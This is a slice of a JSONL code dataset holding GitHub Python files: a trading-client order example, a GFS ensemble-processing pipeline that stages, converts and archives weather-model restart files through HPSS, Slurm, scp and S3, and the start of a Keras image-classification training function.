print(x)","repo_name":"surya-parthipan/Practice","sub_path":"string_manip.py","file_name":"string_manip.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16731216668","text":"import time\nimport uuid\n\nfrom omega_client.communication.single_client_omega_connection import \\\n configure_single_client_omega_connection\nfrom omega_client.messaging.common_types import (AccountCredentials,\n AccountInfo, LeverageType, Order, OrderType, Side, TimeInForce)\nfrom omega_client.messaging.printing_response_handler import \\\n PrintingResponseHandler\n\nOMEGA_ENDPOINT = \"tcp://0.0.0.0:9999\"\nOMEGA_SERVER_KEY = \"omega_server_key\"\n\n\ndef main():\n client_id = 1\n sender_comp_id = str(uuid.uuid4())\n omega_connection = configure_single_client_omega_connection(\n OMEGA_ENDPOINT,\n OMEGA_SERVER_KEY,\n client_id,\n sender_comp_id,\n PrintingResponseHandler())\n\n omega_connection.start()\n omega_connection.wait_until_running()\n\n account_id = 2\n api_key = \"api_key\"\n secret_key = \"secret_key\"\n passphrase = \"passphrase\"\n credentials = AccountCredentials(AccountInfo(account_id), api_key,\n secret_key, passphrase)\n\n omega_connection.logon([credentials])\n omega_connection.send_heartbeat()\n order = Order(\n account_info=AccountInfo(account_id=account_id),\n # ID generated by client to keep track of the order\n client_order_id=str(123),\n client_order_link_id='test', # A str to identify and group orders\n symbol='ETH/USD',\n side=Side.sell.name,\n order_type=OrderType.market.name, # Optional param\n quantity=1.1,\n price=0.0,\n time_in_force=TimeInForce.gtc.name,\n leverage_type=LeverageType.none.name\n )\n omega_connection.place_order(order)\n time.sleep(2)\n omega_connection.logoff()\n time.sleep(2)\n omega_connection.cleanup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"fund3/python_omega_client","sub_path":"omega_client/examples/place_order.py","file_name":"place_order.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28005574254","text":"import os\nimport subprocess\nimport datetime as dt\nimport pathlib\nimport tarfile\nimport shutil\nimport time\nimport yaml\nimport json\nfrom random import randint\nimport inspect\nimport re\nimport glob\n\nimport fv3jeditools.Config.gfs_conf as modconf\nimport fv3jeditools.Utils.utils as utils\n\n__all__ = ['GFS']\n\n# --------------------------------------------------------------------------------------------------\n\n\nclass GFS:\n\n def __init__(self):\n\n # Initialize\n\n self.myName = 'gfs' # Name for this model\n self.hpssRoot = '/NCEPPROD/hpssprod/runhistory/' # Path to archived files\n # Number of ensemble groups per cycle\n self.nGrps = 8\n self.nEns = 80 # Number of ensemble members\n self.stageDir = 'stageGFS'\n self.nRstFiles = 38\n self.nEnsPerGrp = int(self.nEns/self.nGrps)\n\n self.nProcNx = '4' # Number of processors on cube face, x direction\n self.nProcNy = '4' # Number of processors on cube face, y direction\n\n # Horizontal resolution, e.g. 384 where there are 384 by 384 per cube face.\n self.ensRes = '384'\n self.ensLev = '64' # Number of vertical levels\n\n self.yamlOrJson = 'yaml'\n\n # String datetimes\n self.dateTime = dt.datetime(1900, 1, 1)\n self.dateTimeRst = dt.datetime(1900, 1, 1)\n self.Y = ''\n self.m = ''\n self.d = ''\n self.H = ''\n self.YRst = ''\n self.mRst = ''\n self.dRst = ''\n self.HRst = ''\n self.YmDRst = ''\n self.YmD_HRst = ''\n\n # Directories\n self.homeDir = ''\n self.rootDir = ''\n self.workDir = ''\n self.dataDir = ''\n self.fv3fDir = ''\n self.trakDir = ''\n self.convertDir = ''\n\n # Section done markers\n self.Working = 'no'\n\n # Tar file for finished product\n self.tarFile = ''\n\n # ------------------------------------------------------------------------------------------------\n\n def cycleTime(self, datetime):\n\n # Set time information for this cycle\n\n self.dateTime = datetime\n\n six_hours = dt.timedelta(hours=6)\n self.dateTimeRst = self.dateTime + six_hours\n\n self.Y = self.dateTime.strftime('%Y')\n self.m = self.dateTime.strftime('%m')\n self.d = self.dateTime.strftime('%d')\n self.H = self.dateTime.strftime('%H')\n self.YRst = self.dateTimeRst.strftime('%Y')\n self.mRst = self.dateTimeRst.strftime('%m')\n self.dRst = self.dateTimeRst.strftime('%d')\n self.HRst = self.dateTimeRst.strftime('%H')\n\n self.YmD = self.Y+self.m+self.d\n self.YmD_H = self.Y+self.m+self.d+\"_\"+self.H\n self.YmDRst = self.YRst+self.mRst+self.dRst\n self.YmD_HRst = self.YRst+self.mRst+self.dRst+\"_\"+self.HRst\n\n print(\"\\n\")\n print(\" Cycle time: \"+self.Y+self.m+self.d+' '+self.H)\n print(\" -----------------------\\n\")\n\n # ------------------------------------------------------------------------------------------------\n\n def abort(self, message):\n\n print('ABORT: '+message)\n os.remove(self.Working)\n raise(SystemExit)\n\n # ------------------------------------------------------------------------------------------------\n\n def setDirectories(self, work_dir, data_dir):\n\n # Setup the work and home directories\n\n self.homeDir = os.getcwd()\n self.dataDir = data_dir\n self.rootDir = work_dir\n self.workDir = os.path.join(\n work_dir, 'enswork_'+self.Y+self.m+self.d+self.H)\n self.trakDir = os.path.join(self.workDir, 'Tracking')\n\n # Create working directory\n if not os.path.exists(self.workDir):\n os.makedirs(self.workDir)\n\n # Create tracking directory\n if not os.path.exists(self.trakDir):\n os.makedirs(self.trakDir)\n\n # Working flag\n self.Working = os.path.join(self.trakDir, 'working')\n\n if (os.path.exists(self.Working)):\n print('ABORT: '+self.Working +\n ' exists. Already running or previous fail ...')\n raise(SystemExit)\n\n # Directory for converted members\n self.convertDir = os.path.join(\n self.workDir, self.YRst+self.mRst+self.dRst+'_'+self.HRst)\n\n if not os.path.exists(self.convertDir):\n os.makedirs(self.convertDir)\n\n # Create working file\n pathlib.Path(self.Working).touch()\n\n # Path for fv3files\n self.fv3fDir = os.path.join(self.convertDir, 'fv3files')\n\n # Tar file name for finished product\n self.tarFile = 'ens_'+self.YmD_HRst+'.tar'\n\n print(\" Home directory: \"+self.homeDir)\n print(\" Work directory: \"+self.workDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def finished(self):\n\n # Remove the working flag\n os.remove(self.Working)\n\n # ------------------------------------------------------------------------------------------------\n\n def getEnsembleMembersFromArchive(self):\n\n # Method to get an ensemble member and stage it\n myname = 'getEnsembleMembersFromArchive'\n\n # Check if done\n if utils.isDone(self.trakDir, myname):\n return\n\n # Short cuts\n Y = self.Y\n m = self.m\n d = self.d\n H = self.H\n\n # Move to work directory\n os.chdir(self.workDir)\n\n all_done = True\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File name\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+Y+m+d+'_'+H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n\n # File on hpss\n remote_file = os.path.join(self.hpssRoot+'rh'+Y, Y+m, Y+m+d, file)\n\n print(\" Acquiring \"+remote_file)\n\n # Run hsi ls command on the current file for expected size\n tailfile = \"ls_remote_member.txt\"\n utils.run_bash_command(\n self.workDir, \"hsi ls -l \"+remote_file, tailfile)\n\n # Search tail for line with file size\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(\"rstprod\", fp):\n remote_file_size = line.split()[4]\n os.remove(tailfile)\n\n # Fail if unable to determine remote file size\n if (remote_file_size == -1):\n self.abort('unable to determine size of remote file')\n\n # Logic to determine whether to copy member. Only copied if group\n # - Does not exist at all\n # - The local size does not match remote size, indicating previous copy fail\n\n if (not os.path.exists(file)):\n\n print(\" No attempt to get this member group yet, copying...\")\n get_member_set = True\n\n else:\n\n print(\n \" Member group copy already attempted, checking size matches remote\")\n\n # Git size of the local file\n proc = subprocess.Popen(\n ['ls', '-l', file], stdout=subprocess.PIPE)\n local_file_size = proc.stdout.readline().decode(\n 'utf-8').split()[4]\n\n # If size matches no get required, already staged\n if (local_file_size == remote_file_size):\n print(\" Local size matches remote, not copying again.\")\n get_member_set = False\n else:\n print(\" Remote size \"+str(remote_file_size) +\n \" does not match local size \")\n print(str(local_file_size)+\" copying again.\")\n get_member_set = True\n\n # Copy the file to stage directory\n if (get_member_set):\n print(\" Copyng member group\")\n utils.run_bash_command(self.workDir, \"hsi get \"+remote_file)\n\n # Check that the files are copied properly\n if (not os.path.exists(file)):\n mem_failed = True\n else:\n proc = subprocess.Popen(\n ['ls', '-l', file], stdout=subprocess.PIPE)\n new_local_file_size = proc.stdout.readline().decode(\n 'utf-8').split()[4]\n if (new_local_file_size == remote_file_size):\n mem_failed = False\n else:\n mem_failed = True\n\n if (mem_failed):\n all_done = False\n\n # Create file to indicate this part is done\n if (all_done):\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def checkGfsRestartFiles(self, path):\n\n # Check for expected number of restarts in path\n\n if os.path.exists(path):\n return len(os.listdir(path+'/')) == self.nRstFiles\n else:\n return False\n\n # ------------------------------------------------------------------------------------------------\n\n def extractEnsembleMembers(self):\n\n # Extract each group of ensemble members\n\n myname = 'extractEnsembleMembers'\n\n # Check if done and depends\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'getEnsembleMembersFromArchive')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n all_done = True\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File to extract\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+self.Y+self.m+self.d+'_'+self.H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n print(\" Extracting \"+file)\n\n # Member range for group\n memStart = g*self.nEnsPerGrp+1\n memFinal = g*self.nEnsPerGrp+10\n\n # Check whether extracted files already exist\n do_untar = False\n for e in range(memStart, memFinal+1):\n path_rst = os.path.join(\n 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'RESTART')\n done_mem = self.checkGfsRestartFiles(path_rst)\n if (not done_mem):\n do_untar = True\n\n # Extract file\n if (do_untar):\n utils.run_bash_command(self.workDir, \"tar -xvf \"+file)\n else:\n print(\" Extraction already done\")\n\n # Clean up non-restart files\n for e in range(memStart, memFinal+1):\n files = [os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_air'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_int'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.abias_pc'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.atminc.nc'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.cnvstat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.gsistat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H,\n 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.oznstat'),\n os.path.join(self.workDir, 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'gdas.t'+self.H+'z.radstat')]\n for f in range(len(files)):\n if os.path.exists(files[f]):\n os.remove(files[f])\n\n # Recheck for success\n do_untar = False\n for e in range(memStart, memFinal+1):\n path_rst = os.path.join(\n 'enkfgdas.'+self.YmD, self.H, 'mem'+str(e).zfill(3), 'RESTART')\n done_mem = self.checkGfsRestartFiles(path_rst)\n if (not done_mem):\n do_untar = True\n\n if do_untar:\n all_done = False\n\n # Create file to indicate this part is done\n if (not all_done):\n self.abort(\"extractEnsembleMembers failed\")\n\n # Rename from month to convertDir\n os.rename(os.path.join(self.workDir, 'enkfgdas.' +\n self.YmD, self.H), self.convertDir)\n\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n # ------------------------------------------------------------------------------------------------\n\n def postExtractEnsembleMembers(self):\n\n myname = 'postExtractEnsembleMembers'\n\n # Check if done and depends\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'extractEnsembleMembers')\n\n removes = ['*sfcanl_data*', '*fv_srf_wnd*',\n '*phy_data*', '*sfc_data*', '*fv_core.res.nc']\n\n # Remove files not needed again\n for e in range(1, self.nEns+1):\n\n for r in range(len(removes)):\n file_list = glob.glob(os.path.join(\n self.convertDir, 'mem'+str(e).zfill(3), 'RESTART', removes[r]))\n for file_path in file_list:\n os.remove(file_path)\n\n # Remove residual directories\n dir = os.path.join(self.workDir, 'enkfgdas.'+self.YmD)\n if os.path.exists(dir):\n shutil.rmtree(dir)\n\n dir = os.path.join(self.workDir, 'tmpnwprd1')\n if os.path.exists(dir):\n shutil.rmtree(dir)\n\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def removeEnsembleArchiveFiles(self):\n\n # Remove tar files obtained from the arhcive\n\n # Check if done and depends\n myname = 'removeEnsembleArchiveFiles'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'postExtractEnsembleMembers')\n\n # Loop over groups of members\n for g in range(self.nGrps):\n\n # File to extract\n file = ('gpfs_dell1_nco_ops_com_gfs_prod_enkfgdas'\n '.'+self.Y+self.m+self.d+'_'+self.H+'.enkfgdas_restart_grp'+str(g+1)+'.tar')\n\n pathfile = os.path.join(self.workDir, file)\n\n # Remove the file\n if os.path.exists(pathfile):\n print(\" Removing \"+pathfile)\n os.remove(pathfile)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def __preparefv3Files(self):\n\n # First remove fv3files path if it exists\n if os.path.exists(self.fv3fDir):\n shutil.rmtree(self.fv3fDir)\n\n # Copy from the user provided Data directory\n shutil.copytree(os.path.join(self.dataDir, 'fv3files'), self.fv3fDir)\n\n # Update input.nml for this run\n nml_in = open(os.path.join(self.fv3fDir, 'input.nml_template')).read()\n nml_in = nml_in.replace('NPX_DIM', str(int(self.ensRes)+1))\n nml_in = nml_in.replace('NPY_DIM', str(int(self.ensRes)+1))\n nml_in = nml_in.replace('NPZ_DIM', self.ensLev)\n nml_in = nml_in.replace('NPX_PROC', self.nProcNx)\n nml_in = nml_in.replace('NPY_PROC', self.nProcNy)\n nml_out = open(os.path.join(self.fv3fDir, 'input.nml'), 'w')\n nml_out.write(nml_in)\n nml_out.close()\n\n # ------------------------------------------------------------------------------------------------\n\n # Dictionary for converting a state to psi/chi\n\n def __convertStatesDict(self, varchange='id', output_name=''):\n\n # Geometry\n inputresolution = modconf.geometry_dict('inputresolution', 'fv3files')\n outputresolution = modconf.geometry_dict(\n 'outputresolution', 'fv3files')\n\n # Variable change\n if (varchange == 'a2c'):\n varcha = modconf.varcha_a2c_dict('fv3files')\n else:\n varcha = modconf.varcha_id_dict(\n [\"u\", \"v\", \"T\", \"DELP\", \"sphum\", \"ice_wat\", \"liq_wat\", \"o3mr\", \"phis\"])\n\n input = {}\n output = {}\n\n dict_states = {}\n dict_states[\"states\"] = []\n\n for e in range(1, self.nEns+1):\n\n path_mem_in = 'mem'+str(e).zfill(3)+'/RESTART/'\n path_mem_out = 'mem'+str(e).zfill(3)+'/'\n\n # Input/output for member\n input = modconf.state_dict('input', path_mem_in, self.dateTimeRst)\n output = modconf.output_dict('output', path_mem_out, output_name)\n inputout = {**input, **output}\n\n dict_states[\"states\"].append(inputout)\n\n return {**inputresolution, **outputresolution, **varcha, **dict_states}\n\n # ------------------------------------------------------------------------------------------------\n\n def prepare2Convert(self):\n\n # Prepare directories for the members and the configuration files\n\n # Check if done and depends\n myname = 'prepare2Convert'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'removeEnsembleArchiveFiles')\n\n self.__preparefv3Files()\n\n # Create the config files\n csdict = self.__convertStatesDict('a2c', '')\n\n # Write dictionary to config file\n conf_file = os.path.join(\n self.convertDir, 'convert_states.'+self.yamlOrJson)\n with open(conf_file, 'w') as outfile:\n if self.yamlOrJson == 'yaml':\n yaml.dump(csdict, outfile, default_flow_style=False)\n elif self.yamlOrJson == 'json':\n json.dump(csdict, outfile)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n # Submit MPI job that converts the ensemble members\n\n def convertMembersSlurm(self, machine, nodes, taskspernode, hours, jbuild):\n\n # Check if done and depends\n myname = 'convertMembersSlurm'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'prepare2Convert')\n\n # Number of processors for job\n nprocs = str(6*int(self.nProcNx)*int(self.nProcNy))\n\n # Filename\n fname = os.path.join(self.convertDir, 'run.sh')\n\n # Job ID\n jobid = randint(1000000, 9999999)\n jobnm = \"convertstates.\"+str(jobid)\n\n # Hours\n hh = str(hours).zfill(2)\n\n # Bash shell script that runs through all members\n fh = open(fname, \"w\")\n fh.write(\"#!/bin/bash\\n\")\n fh.write(\"\\n\")\n\n fh.write(\"#SBATCH --export=NONE\\n\")\n fh.write(\"#SBATCH --job-name=\"+jobnm+\"\\n\")\n fh.write(\"#SBATCH --output=\"+jobnm+\".log\\n\")\n if machine == 'discover':\n fh.write(\"#SBATCH --partition=compute\\n\")\n fh.write(\"#SBATCH --account=g0613\\n\")\n fh.write(\"#SBATCH --qos=advda\\n\")\n elif machine == 'hera':\n fh.write(\"#SBATCH --account=da-cpu\\n\")\n fh.write(\"#SBATCH --nodes=\"+str(nodes)+\"\\n\")\n fh.write(\"#SBATCH --ntasks-per-node=\"+str(taskspernode)+\"\\n\")\n fh.write(\"#SBATCH --time=\"+hh+\":00:00\\n\")\n\n fh.write(\"\\n\")\n\n fh.write(\"source /usr/share/modules/init/bash\\n\")\n fh.write(\"module purge\\n\")\n if machine == 'discover':\n fh.write(\n \"module use -a /discover/nobackup/projects/gmao/obsdev/rmahajan/opt/modulefiles\\n\")\n fh.write(\"module load apps/jedi/intel-17.0.7.259\\n\")\n elif machine == 'hera':\n fh.write(\n \"module use -a /scratch1/NCEPDEV/da/Daniel.Holdaway/opt/modulefiles/\\n\")\n fh.write(\"module load apps/jedi/intel-19.0.5.281\\n\")\n fh.write(\"module list\\n\")\n\n fh.write(\"\\n\")\n fh.write(\"cd \"+self.convertDir+\"\\n\")\n fh.write(\"\\n\")\n #fh.write(\"export OOPS_TRACE=1\\n\")\n fh.write(\"export build=\"+jbuild+\"\\n\")\n fh.write(\"mpirun -np \"+nprocs +\n \" $build/bin/fv3jedi_convertstate.x convert_states.\"+self.yamlOrJson+\"\\n\")\n fh.write(\"\\n\")\n fh.close()\n\n # Submit job\n os.chdir(self.convertDir)\n utils.run_bash_command(self.convertDir, \"sbatch \"+fname)\n os.chdir(self.homeDir)\n\n # Wait for finish\n print(\" Waiting for sbatch job to finish\")\n\n done_convert = False\n print_job = True\n while not done_convert:\n\n proc = subprocess.Popen(\n ['squeue', '-l', '-h', '-n', jobnm], stdout=subprocess.PIPE)\n squeue_res = proc.stdout.readline().decode('utf-8')\n\n if print_job:\n print(\" Slurm job info: \")\n print(squeue_res)\n print_job = False\n\n if squeue_res is '':\n done_convert = True\n print(' Slurm job is finished, checking for success...')\n break\n\n # If not finished wait another minute\n time.sleep(60)\n\n # Grep for success\n with open(jobnm+'.log', \"r\") as fp:\n for line in fp:\n if re.search(\"status = 0\", line):\n print(' convertMembersSlurm finished successfully')\n else:\n self.abort(\"convertMembersSlurm failed. Job name: \"+jobnm)\n\n # Remove slurm job script\n os.remove(fname)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def postConvertCleanUp(self):\n\n # Clean up large files\n\n # Check if done and depends\n myname = 'postConvertCleanUp'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'convertMembersSlurm')\n\n # Remove restart directories\n for e in range(1, self.nEns+1):\n\n path_mem_in = os.path.join(\n self.convertDir, 'mem'+str(e).zfill(3), 'RESTART')\n shutil.rmtree(path_mem_in)\n\n # Clean up convert directory\n shutil.rmtree(os.path.join(self.convertDir, 'fv3files'))\n os.remove(os.path.join(self.convertDir, 'logfile.000000.out'))\n\n # Clean up work directory\n shutil.rmtree(os.path.join(self.workDir, 'enkfgdas.'+self.YmD))\n\n # Need to tar again\n os.remove(os.path.join(self.trakDir, 'tarWorkDirectory'))\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def tarWorkDirectory(self):\n\n # Check if done and depends\n myname = 'tarWorkDirectory'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'removeEnsembleArchiveFiles')\n\n # Avoid absolute paths in tar file\n os.chdir(self.rootDir)\n\n if not os.path.exists(os.path.join(self.tarFile)):\n utils.run_bash_command(\n self.rootDir, \"tar -cvf \"+self.tarFile+\" \"+\"enswork_\"+self.Y+self.m+self.d+self.H)\n else:\n print(\" Tar file for converted members already created\")\n\n # Search tail for line with file size\n for e in range(1, self.nEns+1):\n\n # Check tarring process worked\n filesearch = os.path.join('enswork_'+self.Y+self.m+self.d+self.H, self.YmD_HRst, 'mem'+str(\n e).zfill(3), 'RESTART', self.YRst+self.mRst+self.dRst+'.'+self.HRst+'0000.fv_core.res.tile1.nc')\n\n tailfile = \"tar_check.txt\"\n utils.run_bash_command(\n self.rootDir, \"tar -tvf \"+self.tarFile+\" \"+filesearch, tailfile, 'no')\n\n filesearch_found = ''\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain('failure', fp):\n filesearch_found = line\n os.remove(tailfile)\n\n # Abort if the check fails\n if filesearch_found != '':\n self.abort('tarWorkDirectory failed:, ' +\n filesearch+' not found in tar file.')\n\n os.chdir(self.homeDir)\n\n # Remove the convertdir directory\n shutil.rmtree(self.convertDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def membersFromHera(self):\n\n # Check if done and depends\n myname = 'membersFromHera'\n if utils.isDone(self.trakDir, myname):\n return True\n\n # Move to root directory\n os.chdir(self.rootDir)\n\n hera_path = os.path.join('/scratch1', 'NCEPDEV', 'da',\n 'Daniel.Holdaway', 'JediWF', 'StaticB', 'wrk', self.tarFile)\n tailfile = os.path.join(self.workDir, \"ls_hera_tar.txt\")\n utils.run_bash_command(\n self.workDir, \"ssh Daniel.Holdaway@dtn-hera.fairmont.rdhpcs.noaa.gov ls -l \"+hera_path, tailfile)\n\n # Search tail for line with file size\n hera_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(self.tarFile, fp):\n print(line)\n hera_file_size = line.split()[4]\n os.remove(tailfile)\n\n if hera_file_size == -1:\n print(\" This date/time not available on Hera yet\")\n return False\n\n # Check if copy already attempted\n disc_file_size = -1\n if (os.path.exists(self.tarFile)):\n proc = subprocess.Popen(\n ['ls', '-l', self.tarFile], stdout=subprocess.PIPE)\n disc_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n # If not matching in file size copy\n if not hera_file_size == disc_file_size:\n print(' Copying:')\n tailfile = os.path.join(self.workDir, \"scp_hera_tar.txt\")\n utils.run_bash_command(\n self.workDir, \"scp Daniel.Holdaway@dtn-hera.fairmont.rdhpcs.noaa.gov:\"+hera_path+\" ./\", tailfile)\n os.remove(tailfile)\n\n # Check copy was successful\n disc_file_size = -1\n if (os.path.exists(self.tarFile)):\n proc = subprocess.Popen(\n ['ls', '-l', self.tarFile], stdout=subprocess.PIPE)\n disc_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n if not hera_file_size == disc_file_size:\n self.abort(' In copying from hera there\\'s a size discrepancy')\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n os.chdir(self.homeDir)\n\n return True\n\n # ------------------------------------------------------------------------------------------------\n\n # Untar the converted members\n\n def extractWorkDirectory(self):\n\n myname = 'extractWorkDirectory'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'membersFromHera')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n tailfile = \"untar_converted_members.txt\"\n utils.run_bash_command(\n self.workDir, \"tar -xvf \"+self.tarFile, tailfile)\n\n # Move to root directory\n os.chdir(self.homeDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n # Untar the converted members\n\n def extractWorkDirectoryDisco(self):\n\n myname = 'extractWorkDirectoryDisco'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'membersFromHera')\n\n # Move to work directory\n os.chdir(self.workDir)\n\n tailfile = \"untar_converted_members.txt\"\n utils.run_bash_command(\n self.workDir, \"tar -xvf \"+self.tarFile, tailfile)\n\n # Move to root directory\n os.chdir(self.homeDir)\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n\n def ship2S3(self, s3path):\n\n myname = 'ship2S3'\n if utils.isDone(self.trakDir, myname):\n return\n utils.depends(self.trakDir, myname, 'tarWorkDirectory')\n\n file2ship = os.path.join(self.rootDir, self.tarFile)\n\n s3file = os.path.join(s3path, self.tarFile)\n\n # File size locally\n local_file_size = -1\n if (os.path.exists(file2ship)):\n proc = subprocess.Popen(\n ['ls', '-l', file2ship], stdout=subprocess.PIPE)\n local_file_size = proc.stdout.readline().decode('utf-8').split()[4]\n\n # File size on S3\n tailfile = os.path.join(self.workDir, \"ls_remote_file.txt\")\n utils.run_bash_command(self.workDir, \"aws2 s3 ls \"+s3file, tailfile)\n\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(self.tarFile, fp):\n remote_file_size = line.split()[2]\n os.remove(tailfile)\n\n if local_file_size != remote_file_size:\n\n # Copy file to S3\n utils.run_bash_command(\n self.workDir, \"aws2 s3 cp \"+file2ship+\" \"+s3file)\n\n # Recheck File size on S3\n tailfile = os.path.join(self.workDir, \"ls_remote_file.txt\")\n utils.run_bash_command(\n self.workDir, \"aws2 s3 ls \"+s3file, tailfile)\n\n remote_file_size = -1\n with open(tailfile, \"r\") as fp:\n for line in utils.lines_that_contain(self.tarFile, fp):\n remote_file_size = line.split()[2]\n os.remove(tailfile)\n\n # Fail if not matching\n if local_file_size != remote_file_size:\n self.abort(\"Local size does not match S3 size\")\n\n # Set as done\n utils.setDone(self.trakDir, myname)\n\n # ------------------------------------------------------------------------------------------------\n","repo_name":"JoshuaFu-NOAA/fv3-jedi-tools","sub_path":"src/fv3jeditools/ConvertEnsemble/gfs_ens_proc.py","file_name":"gfs_ens_proc.py","file_ext":"py","file_size_in_byte":30976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16906346337","text":"from common.logger import logger\nfrom common import filesystem, utils\nfrom machine.training.lib import image_utils\nfrom machine.training.lib.image_generator import image_data_generation\nfrom machine.training.lib.custom_model import custom_model\nfrom keras import optimizers\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping,TensorBoard\n\n\n\nimport os\nlogger.initialize()\n\n\ndef base_category_training(_Train_Common_Params, epoch_factor=50):\n \"\"\"\n Common categorizing Training\n :param _Train_Common_Params: Class for Model Training, Inlucing sub-clases\n :return:\n \"\"\"\n logger.info(\"Training Start\")\n\n _Model_Selection_Params = _Train_Common_Params.i_Model_Selection_Params\n _Dataset_Path = _Train_Common_Params.i_Dataset_Path\n _Generator_Params = _Train_Common_Params.i_Generator_Params\n _Results_Path_Params = _Train_Common_Params.i_Results_Path_Params\n _Training_Params = _Train_Common_Params.i_Training_Params\n\n logger.info(\"Check Class Number for categorizing\")\n __train_path = _Dataset_Path.training_path\n __folders = filesystem.get_folders(__train_path)\n __class_number = len(__folders)\n logger.debug(\"Category Number is : \" + str(__class_number))\n\n logger.info(\"Generating Input shape and train/validation dataset\")\n __input_shape = image_utils.image_input_shape(_Generator_Params)\n __train_generator, __validation_generator, __test_generator, __class_generator = image_data_generation(_Dataset_Path, _Generator_Params)\n logger.debug(\"Check Classes : \" + str(__class_generator))\n\n logger.debug(\"Check Train data_generator \")\n __base_path = _Results_Path_Params.base_path\n\n logger.info(\"Result and tensor log path Setup\")\n __top_weight_path = _Results_Path_Params.top_weight_path\n __result_weight_path = _Results_Path_Params.result_weight_path\n __tensor_log_path = _Results_Path_Params.tensor_log_path\n\n _Model_Selection_Params.set(__input_shape, __class_number, _Generator_Params.width, _Generator_Params.height)\n\n __model = custom_model(_Model_Selection_Params)\n if __model is None:\n logger.warning(\"Not available Model options\")\n return False\n\n # plot_model(__model, to_file='model.png')\n __optimizer = optimizers.RMSprop()\n # __optimizer = keras.optimizers.Adam()\n __model.compile(optimizer=__optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n\n logger.debug(\"Loaded Model Type\")\n logger.debug(str(__model.summary()))\n\n __model_name = utils.file_name_generator(identification='result', title='model', extension='png')\n __model_image_path = os.path.join(__base_path, __model_name)\n\n logger.debug(\"Add CallbackList\")\n __callbacks_list = [\n ModelCheckpoint(__top_weight_path, monitor='val_acc', verbose=1, save_best_only=True),\n EarlyStopping(monitor='val_acc', patience=80, verbose=0),\n TensorBoard(log_dir=__tensor_log_path, histogram_freq=0, write_graph=True, write_images=True)\n ]\n\n __batch_size = _Generator_Params.batch_size\n\n _Training_Params.set(batch_size=__batch_size, train_data=__train_generator, validation_data=__validation_generator)\n\n logger.info(\"Generating and Fitting Model for training\")\n __history_transfer = __model.fit_generator(_Training_Params.train_data,\n epochs=_Training_Params.epoch,\n 